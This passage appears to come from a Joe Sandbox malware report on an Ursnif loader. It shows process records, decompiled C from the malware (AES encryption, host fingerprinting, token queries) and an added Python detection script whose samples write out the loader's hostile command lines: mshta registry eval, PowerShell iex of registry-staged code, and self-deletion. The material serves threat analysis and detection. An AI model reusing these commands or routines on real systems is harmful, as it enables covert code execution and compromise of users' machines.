                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:43
                        Start time:11:29:19
                        Start date:25/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):
                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"
                        Imagebase:
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
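
The process entries above record the loader's living-off-the-land chain: mshta.exe evaluating JScript read from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>\TestLocal, powershell.exe decoding the UrlsReturn value of the same key through throw-away aliases for gp and iex, csc.exe and cvtres.exe compiling code out of Temp (the pattern PowerShell's Add-Type leaves behind), control.exe -h carrying Ursnif Yara matches in its memory, a cmd /C ping localhost -n 5 && del self-deletion of the dropped DLL, and an nslookup myip.opendns.com external-IP lookup. The Python below is an added example, not part of the Joe Sandbox report: it runs detection logic for those command-line patterns over a handful of process-creation records constructed here after the entries above (not real telemetry), resolves the new-alias indirection so the hidden iex and gp are visible to the match, and extracts the staging GUID key as a triage indicator. Rule names and the record shape are assumptions of this example.

```python
import re

# Constructed sample process-creation records (image path, command line),
# modeled on the process entries in the report above. They are not real
# telemetry; the last two are benign controls that must not fire.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\mshta.exe",
     r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''),
    (r"C:\Windows\System32\cmd.exe",
     r'''C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll'''),
    (r"C:\Windows\System32\cmd.exe",
     r'''cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"'''),
    (r"C:\Windows\System32\cmd.exe",
     r'''cmd /C ping 10.0.0.5 -n 4 > C:\Temp\reach.txt'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell.exe -Command Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"'''),
]

# new-alias -name <alias> -value <cmdlet>  (alias and cmdlet stop at whitespace or ';')
ALIAS_RE = re.compile(r"new-alias\s+-name\s+([^\s;]+)\s+-value\s+([^\s;]+)", re.I)

# Staging key used by both the mshta and the powershell stage: HKCU, any mix of
# ':' and backslashes, ...\Microsoft\<GUID>
STAGE_KEY_RE = re.compile(
    r"HKCU[:\\]+Software\\+AppDataLow\\+Software\\+Microsoft\\+([0-9A-Fa-f-]{36})", re.I)

# (rule name, regex on the image path, regex on the (alias-resolved) command line)
RULES = [
    ("mshta_inline_hta_registry_eval", r"mshta\.exe$",
     r"about:<hta:application>.*\b(regread|eval)\s*\("),
    ("powershell_registry_staged_script", r"powershell\.exe$",
     r"\b(iex|invoke-expression)\b.*\b(gp|get-itemproperty)\b.*\bHKCU:"),
    ("ping_delay_then_self_delete", r"cmd\.exe$",
     r"\bping\s+\S+\s+-n\s+\d+\b.*&&\s*del\b"),
    ("external_ip_lookup_opendns", r"cmd\.exe$",
     r"\bnslookup\s+myip\.opendns\.com\s+resolver1\.opendns\.com\b"),
]


def resolve_aliases(cmdline: str) -> str:
    """Inline every alias declared with new-alias so the real cmdlet names
    (here gp and iex) become visible to the pattern match."""
    resolved = cmdline
    for name, value in ALIAS_RE.findall(cmdline):
        resolved = re.sub(r"\b" + re.escape(name) + r"\b",
                          lambda _m, v=value: v, resolved)
    return resolved


def registry_stage_key(cmdline: str):
    """Return the GUID of the HKCU\\...\\AppDataLow\\...\\Microsoft\\<GUID>
    staging key referenced by a command line, or None."""
    m = STAGE_KEY_RE.search(cmdline)
    return m.group(1).upper() if m else None


def classify(image: str, cmdline: str) -> list:
    """Names of every rule that matches one process-creation record."""
    text = resolve_aliases(cmdline) if image.lower().endswith("powershell.exe") else cmdline
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, image, re.I) and re.search(cmd_re, text, re.I | re.S):
            hits.append(name)
    return hits


def scan(events) -> list:
    """Run all rules over (image, cmdline) records; returns [(rule, image, guid_or_None)]."""
    findings = []
    for image, cmdline in events:
        for rule in classify(image, cmdline):
            findings.append((rule, image, registry_stage_key(cmdline)))
    return findings


if __name__ == "__main__":
    for rule, image, guid in scan(SAMPLE_EVENTS):
        print(f"{rule:36} {image}  stage-key={guid}")
```

The alias resolution is the part worth keeping: the PowerShell stage never spells out iex or Get-ItemProperty, so a rule that only greps the raw command line for those tokens misses it, while the mshta stage is caught by the inline about:<hta:application> document plus regread/eval regardless of how the key path is obfuscated. The ping rule deliberately accepts any host after ping, since only the && del tail distinguishes the self-delete from ordinary reachability checks.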


                          Execution Graph

                          Execution Coverage:9.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:14
                          Total number of Limit Nodes:2
                          Execution graph (graph rendering not reproduced): 0x401520 -> 0x40152c -> 0x401500 -> 0x40ba80 -> 0x401360 -> 0x401379 -> 0x401469 (GetBinaryTypeA) -> 0x4013a3 -> 0x401509 -> back to 0x40152c; a second path 0x401520 -> 0x401541 -> 0x40152c -> 0x401500 (GetBinaryTypeA) loops back to 0x401541; both paths exit at 0x401567.

                          Callgraph

                          Control-flow Graph

                          Control-flow graph (graph rendering not reproduced). Function 0x401360-0x4014ff in loaddll32, 12 basic blocks: the entry block 0x401360-0x401398 calls 0x40baa0 twice, block 0x401469-0x4014b0 calls GetBinaryTypeA, block 0x4013a3-0x40140f calls 0x40c1c0, and every path returns through the exit block 0x4014e8-0x4014ff.
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.299258392.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.299243472.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299270349.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299276500.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299290223.000000000040E000.00000008.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299296423.0000000000413000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299301417.0000000000416000.00000008.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.299390763.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                          Similarity
                          • API ID: BinaryType
                          • String ID:
                          • API String ID: 3726996659-0
                          • Opcode ID: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                          • Instruction ID: 678d90c2e14f759a0a694654a23e79d3ffc57d339712660e24010735e9a51d0b
                          • Opcode Fuzzy Hash: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                          • Instruction Fuzzy Hash: 424176B0A00205CFDB08DFA8C5953AA7BB1EB45308F64816ED405AF3A1C73AD946CB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Control-flow graph (graph rendering not reproduced). Function 0x5b700dc-0x5b70562 in the unpacked module mapped at 0x05B60000 inside rundll32: it initializes critical sections (RtlInitializeCriticalSection, with memset and a heap-backed subcall), creates a mutex and checks GetLastError, closing the handle on one branch, reads the user name (GetUserNameA, retried after RtlAllocateHeap), queries process information (NtQueryInformationProcess, OpenProcess, CloseHandle) and the process owning the shell window (GetShellWindow, GetWindowThreadProcessId), copies a 0x18-byte record (memcpy), creates or opens a named event (CreateEventA / OpenEventA), and on one path calls LoadLibraryA, SetEvent, RtlAllocateHeap and wsprintfA. Exit blocks: 0x5b70553-0x5b70562.
                          APIs
                          • RtlInitializeCriticalSection.NTDLL(05B8A428), ref: 05B700FA
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B7012B
                          • RtlInitializeCriticalSection.NTDLL(05FBC2D0), ref: 05B7013C
                            • Part of subcall function 05B75261: RtlInitializeCriticalSection.NTDLL(05B8A400), ref: 05B75285
                            • Part of subcall function 05B75261: RtlInitializeCriticalSection.NTDLL(05B8A3E0), ref: 05B7529B
                            • Part of subcall function 05B75261: GetVersion.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752AC
                            • Part of subcall function 05B75261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752E0
                            • Part of subcall function 05B78452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 05B7846C
                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,05B69100,?), ref: 05B70165
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70176
                          • CloseHandle.KERNEL32(000005C8,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B7018A
                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05B701D3
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B701E6
                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05B701FB
                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 05B7022B
                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70240
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B7024A
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70257
                          • GetShellWindow.USER32 ref: 05B70272
                          • GetWindowThreadProcessId.USER32(00000000), ref: 05B70279
                          • memcpy.NTDLL(05B8A2F4,?,00000018,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B702B5
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05B69100,?), ref: 05B70333
                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 05B7035D
                          • OpenEventA.KERNEL32(00100000,00000000,05FBB9C8,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70385
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000,05FBB9C8,?,?,?,?,?,?,?,05B69100,?), ref: 05B7039A
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B703A0
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B70438
                          • SetEvent.KERNEL32(?,05B7C384,00000000,00000000,?,?,?,?,?,?,?,05B69100,?), ref: 05B704CE
                          • RtlAllocateHeap.NTDLL(00000000,00000043,05B7C384), ref: 05B704E3
                          • wsprintfA.USER32 ref: 05B70513
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                          • String ID:
                          • API String ID: 3929413950-0
                          • Opcode ID: 733774fc54bc421096a3ad383b857e2d513d168a2e1baf1a023888cd91616ace
                          • Instruction ID: 9c38c19dc9ba0cf902c7abe8c3f960044adbc3d8f320934df928833a04b37999
                          • Opcode Fuzzy Hash: 733774fc54bc421096a3ad383b857e2d513d168a2e1baf1a023888cd91616ace
                          • Instruction Fuzzy Hash: FEC158B161424CAFC720FF64E88E93A7BAAFB85610B64589FF56687240DB34B444CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Control-flow graph (graph rendering not reproduced). Function 0x1005fbb-0x1006162: CryptAcquireContextW, then memcpy and CryptImportKey, CryptSetKeyParam, and a loop that copies the input and calls CryptEncrypt or CryptDecrypt; every failure path records GetLastError, and the exits pass through CryptDestroyKey and CryptReleaseContext. The decompilation below corresponds to this graph.
                          C-Code - Quality: 58%
                          			// AES-128-CBC encrypt/decrypt helper built on CryptoAPI. Decompiler names kept:
                          			// __eax = input length, _a4 = non-zero to encrypt / zero to decrypt,
                          			// _a8 = pointer to the 16-byte key, _a12 = input, _a16/_a20 = out-pointers
                          			// for the result buffer and its length. Returns a Win32 error code (0 = success).
                          			// The indirect calls through 0x100a0e8, 0x100a0e4 and 0x100a0c0 are
                          			// CryptAcquireContextW, CryptSetKeyParam and CryptEncrypt, matching the
                          			// control-flow graph of this function.
                          			E01005FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                          				int _v8;            // bytes handled in the current 16-byte piece
                          				long* _v12;         // HCRYPTKEY
                          				int _v16;           // total output bytes produced
                          				BYTE* _v20;         // output buffer
                          				long* _v24;         // HCRYPTPROV
                          				void* _v39;
                          				char _v40;          // 16-byte all-zero IV
                          				void _v56;          // key blob: 16 key bytes (offset 12)
                          				int _v60;           // key blob: cbKeySize = 0x10 (offset 8)
                          				intOrPtr _v64;      // key blob: aiKeyAlg = 0x660e, CALG_AES_128 (offset 4)
                          				void _v67;          // key blob: bVersion = 2, CUR_BLOB_VERSION (offset 1)
                          				char _v68;          // key blob: bType = 8, PLAINTEXTKEYBLOB (offset 0)
                          				void* _t61;
                          				int _t68;
                          				signed int _t76;
                          				int _t79;
                          				int _t81;
                          				int _t85;
                          				long _t86;
                          				int _t90;
                          				signed int _t94;
                          				int _t101;
                          				BYTE* _t102;
                          				int _t103;
                          				void* _t104;
                          				void* _t105;
                          				void* _t106;
                          
                          				_t103 = __eax;                                   // remaining input length
                          				_t94 = 6;
                          				_v68 = 0;
                          				memset( &_v67, 0, _t94 << 2);                    // zero the 28-byte (0x1c) key blob
                          				_t105 = _t104 + 0xc;
                          				asm("stosw");
                          				asm("stosb");
                          				_v40 = 0;                                        // zero the 16-byte IV
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosw");
                          				asm("stosb");
                          				// CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES (0x18), CRYPT_VERIFYCONTEXT (0xf0000000))
                          				_t61 =  *0x100a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                          				if(_t61 == 0) {
                          					_a8 = GetLastError();
                          				} else {
                          					_t101 = 0x10;
                          					memcpy( &_v56, _a8, _t101);                  // copy the raw 16-byte key into the blob body
                          					_t106 = _t105 + 0xc;
                          					_v60 = _t101;                                // cbKeySize = 16
                          					_v67 = 2;                                    // bVersion = CUR_BLOB_VERSION
                          					_v64 = 0x660e;                               // aiKeyAlg = CALG_AES_128
                          					_v68 = 8;                                    // bType = PLAINTEXTKEYBLOB
                          					// CryptImportKey(hProv, blob, 0x1c, hPubKey = 0, flags = 0, &hKey): plaintext key, no wrapping key
                          					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                          					if(_t68 == 0) {
                          						_a8 = GetLastError();
                          					} else {
                          						// CryptSetKeyParam(hKey, KP_IV (1), &zeroIV, 0): CBC mode with an all-zero IV
                          						_push(0);
                          						_push( &_v40);
                          						_push(1);
                          						_push(_v12);
                          						if( *0x100a0e4() == 0) {
                          							_a8 = GetLastError();
                          						} else {
                          							// Output size: round the input length up to a multiple of 16; when encrypting
                          							// an already aligned length, reserve one more block for the padding block.
                          							_t18 = _t103 + 0xf; // 0x10
                          							_t76 = _t18 & 0xfffffff0;
                          							if(_a4 != 0 && _t76 == _t103) {
                          								_t76 = _t76 + _t101;
                          							}
                          							_t102 = E01006D63(_t76);                 // inferred heap-allocation wrapper (result is null-checked)
                          							_v20 = _t102;
                          							if(_t102 == 0) {
                          								_a8 = 8;                             // ERROR_NOT_ENOUGH_MEMORY
                          							} else {
                          								_v16 = 0;
                          								_a8 = 0;
                          								while(1) {
                          									// Copy the next 16 bytes (or whatever is left) into the output buffer
                          									// and transform them in place.
                          									_t79 = 0x10;
                          									_v8 = _t79;
                          									if(_t103 <= _t79) {
                          										_v8 = _t103;
                          									}
                          									memcpy(_t102, _a12, _v8);
                          									_t81 = _v8;
                          									_a12 = _a12 + _t81;
                          									_t103 = _t103 - _t81;
                          									_t106 = _t106 + 0xc;
                          									// Final = (no input left). CryptEncrypt gets dwBufLen = 0x20 so the padding
                          									// block of the last piece fits.
                          									if(_a4 == 0) {
                          										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                          									} else {
                          										_t85 =  *0x100a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                          									}
                          									if(_t85 == 0) {
                          										break;
                          									}
                          									_t90 = _v8;                          // bytes actually written for this piece
                          									_v16 = _v16 + _t90;
                          									_t102 =  &(_t102[_t90]);
                          									if(_t103 != 0) {
                          										continue;
                          									} else {
                          										L17:
                          										 *_a16 = _v20;                   // hand the buffer and its length back
                          										 *_a20 = _v16;
                          									}
                          									goto L21;
                          								}
                          								// CryptEncrypt/CryptDecrypt failed: free the buffer unless the last
                          								// error is 0, in which case the partial result is returned as success.
                          								_t86 = GetLastError();
                          								_a8 = _t86;
                          								if(_t86 != 0) {
                          									E01006C2C(_v20);                 // inferred heap-free wrapper
                          								} else {
                          									goto L17;
                          								}
                          							}
                          						}
                          						L21:
                          						CryptDestroyKey(_v12);
                          					}
                          					CryptReleaseContext(_v24, 0);
                          				}
                          				return _a8;
                          			}

                          APIs
                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010024D8,00000001,010058D7,00000000), ref: 01005FF3
                          • memcpy.NTDLL(010024D8,010058D7,00000010,?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740), ref: 0100600C
                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01006035
                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0100604D
                          • memcpy.NTDLL(00000000,75BCC740,052995B0,00000010), ref: 0100609F
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,052995B0,00000020,?,?,00000010), ref: 010060C8
                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,052995B0,?,?,00000010), ref: 010060DF
                          • GetLastError.KERNEL32(?,?,00000010), ref: 010060F7
                          • GetLastError.KERNEL32 ref: 01006129
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 01006135
                          • GetLastError.KERNEL32 ref: 0100613D
                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0100614A
                          • GetLastError.KERNEL32(?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01006152
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                          • String ID:
                          • API String ID: 1967744295-0
                          • Opcode ID: d7b80aa1a81afdebc741c7487df500d924cea49662e2021c5e4d7631c032fd07
                          • Instruction ID: 08b374d7569555b77e1952e10d590f629ddbc700592e6e7b9578445e192ab176
                          • Opcode Fuzzy Hash: d7b80aa1a81afdebc741c7487df500d924cea49662e2021c5e4d7631c032fd07
                          • Instruction Fuzzy Hash: DB514071900209FFEB12DFA8DC84AEE7BBAFB04350F048465F945E7281D7768A24DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 96%
                          			E01003365(char __eax, void* __esi) {
                          				long _v8;
                          				char _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v28;
                          				long _t34;
                          				signed int _t39;
                          				long _t50;
                          				char _t59;
                          				intOrPtr _t61;
                          				void* _t62;
                          				void* _t64;
                          				char _t65;
                          				intOrPtr* _t67;
                          				void* _t68;
                          				void* _t69;
                          
                          				_t69 = __esi;
                          				_t65 = __eax;
                          				_v8 = 0;
                          				_v12 = __eax;
                          				if(__eax == 0) {
                          					_t59 =  *0x100a310; // 0xd448b889
                          					_v12 = _t59;
                          				}
                          				_t64 = _t69;
                          				E01002119( &_v12, _t64);
                          				if(_t65 != 0) {
                          					 *_t69 =  *_t69 ^  *0x100a344 ^ 0x46d76429;
                          				} else {
                          					GetUserNameW(0,  &_v8); // executed
                          					_t50 = _v8;
                          					if(_t50 != 0) {
                          						_t62 = RtlAllocateHeap( *0x100a2d8, 0, _t50 + _t50);
                          						if(_t62 != 0) {
                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                          								_t64 = _t62;
                          								 *_t69 =  *_t69 ^ E0100708D(_v8 + _v8, _t64);
                          							}
                          							HeapFree( *0x100a2d8, 0, _t62);
                          						}
                          					}
                          				}
                          				_t61 = __imp__;
                          				_v8 = _v8 & 0x00000000;
                          				GetComputerNameW(0,  &_v8);
                          				_t34 = _v8;
                          				if(_t34 != 0) {
                          					_t68 = RtlAllocateHeap( *0x100a2d8, 0, _t34 + _t34);
                          					if(_t68 != 0) {
                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                          							_t64 = _t68;
                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0100708D(_v8 + _v8, _t64);
                          						}
                          						HeapFree( *0x100a2d8, 0, _t68);
                          					}
                          				}
                          				asm("cpuid");
                          				_t67 =  &_v28;
                          				 *_t67 = 1;
                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                          				 *(_t67 + 0xc) = _t64;
                          				_t39 = _v16 ^ _v20 ^ _v28;
                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                          				return _t39;
                          			}

                          APIs
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0100339C
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 010033B3
                          • GetUserNameW.ADVAPI32(00000000,?), ref: 010033C0
                          • HeapFree.KERNEL32(00000000,00000000), ref: 010033E1
                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01003408
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0100341C
                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01003429
                          • HeapFree.KERNEL32(00000000,00000000), ref: 01003447
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: HeapName$AllocateComputerFreeUser
                          • String ID:
                          • API String ID: 3239747167-0
                          • Opcode ID: 929749c58a8794a544b453386ddbf9ab3d416944dc38a5da1a565cdbf9cea322
                          • Instruction ID: 9cf108739cafc7b5490ad63f51e857b3a668efd9b848c75175a97e1e66aa2aa4
                          • Opcode Fuzzy Hash: 929749c58a8794a544b453386ddbf9ab3d416944dc38a5da1a565cdbf9cea322
                          • Instruction Fuzzy Hash: D9313D71A00305EFE722DFA9DC81BAEB7F9FB48200F518479E585D7251DB35E9019B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • StrRChrA.SHLWAPI(05FBB5B0,00000000,0000005C,?,?,?), ref: 05B69028
                          • _strupr.NTDLL ref: 05B6903E
                          • lstrlen.KERNEL32(05FBB5B0,?,?), ref: 05B69046
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 05B690C6
                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,05B8076B), ref: 05B690ED
                          • GetLastError.KERNEL32(?,?,?,?), ref: 05B69107
                          • RtlRemoveVectoredExceptionHandler.NTDLL(059805B8), ref: 05B6911D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                          • String ID:
                          • API String ID: 2251957091-0
                          • Opcode ID: 5194b7386555386bfa7bbf5c3a0fb36fe80dd0b824f525c560e26ca592355f79
                          • Instruction ID: 80ae4a1a3fd28e74ee2b37529d2cdd412b465ec467b5f15bb9f8ec4ae29fd2d6
                          • Opcode Fuzzy Hash: 5194b7386555386bfa7bbf5c3a0fb36fe80dd0b824f525c560e26ca592355f79
                          • Instruction Fuzzy Hash: CF310F72914115AFEB20BFB4DC8A97E7F96FB05260B6514A7F612D3140DE39B841CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 05B6C478
                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 05B6C48B
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 05B6C4A7
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 05B6C4C4
                          • memcpy.NTDLL(?,00000000,0000001C), ref: 05B6C4D1
                          • NtClose.NTDLL(?), ref: 05B6C4E3
                          • NtClose.NTDLL(?), ref: 05B6C4ED
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 2575439697-0
                          • Opcode ID: 949c907bb95f9dd62674dea9be5fb590597d0f08bf7bb7e267aaaeb17a8dc18e
                          • Instruction ID: 917e38762e715f0e2c9a10ff1466813a33f8fbb0a8669b5a5d742254cfa43db3
                          • Opcode Fuzzy Hash: 949c907bb95f9dd62674dea9be5fb590597d0f08bf7bb7e267aaaeb17a8dc18e
                          • Instruction Fuzzy Hash: 832114B2A10218BBDB11EF95CC45AEEBFBDFF08740F104062F905E6160DB75AA40DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 38%
                          			E01004321(char _a4, void* _a8) {
                          				void* _v8;
                          				void* _v12;
                          				char _v16;
                          				void* _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				void* _v44;
                          				void** _t33;
                          				void* _t40;
                          				void* _t43;
                          				void** _t44;
                          				intOrPtr* _t47;
                          				char _t48;
                          
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				asm("stosd");
                          				_v20 = _a4;
                          				_t48 = 0;
                          				_v16 = 0;
                          				_a4 = 0;
                          				_v44 = 0x18;
                          				_v40 = 0;
                          				_v32 = 0;
                          				_v36 = 0;
                          				_v28 = 0;
                          				_v24 = 0;
                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                          					_t33 =  &_v8;
                          					__imp__(_v12, 8, _t33);
                          					if(_t33 >= 0) {
                          						_t47 = __imp__;
                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                          						_t44 = E01006D63(_a4);
                          						if(_t44 != 0) {
                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                          							if(_t40 >= 0) {
                          								memcpy(_a8,  *_t44, 0x1c);
                          								_t48 = 1;
                          							}
                          							E01006C2C(_t44);
                          						}
                          						NtClose(_v8); // executed
                          					}
                          					NtClose(_v12);
                          				}
                          				return _t48;
                          			}

                          APIs
